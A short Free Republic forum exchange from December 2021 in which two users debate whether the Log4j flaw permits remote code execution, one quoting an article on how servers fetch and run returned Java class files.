Free Republic
Browse · Search 		News/Activism
Topics · Post Article

To: vikingd00d
“The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.”

You just proved it's not performing remote code execution. There's nothing in Log4j that lets you run any code. It does a lookup, but that is not executed code or arbitrary code.

8 posted on 12/12/2021 9:39:11 PM PST by ConservativeMind (Trump: Befuddling Democrats, Republicans, and the Media for the benefit of the US and all mankind.)
[ Post Reply | Private Reply | To 7 | View Replies ]

To: ConservativeMind

>>There’s nothing in Log4j that lets you run any code.

Did you miss THIS?

“And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.”

Downloading and running arbitrary code seems like a bad idea.


9 posted on 12/12/2021 9:44:43 PM PST by vikingd00d (chown -R us ~you/base)
[ Post Reply | Private Reply | To 8 | View Replies ]

Free Republic
Browse · Search 		News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson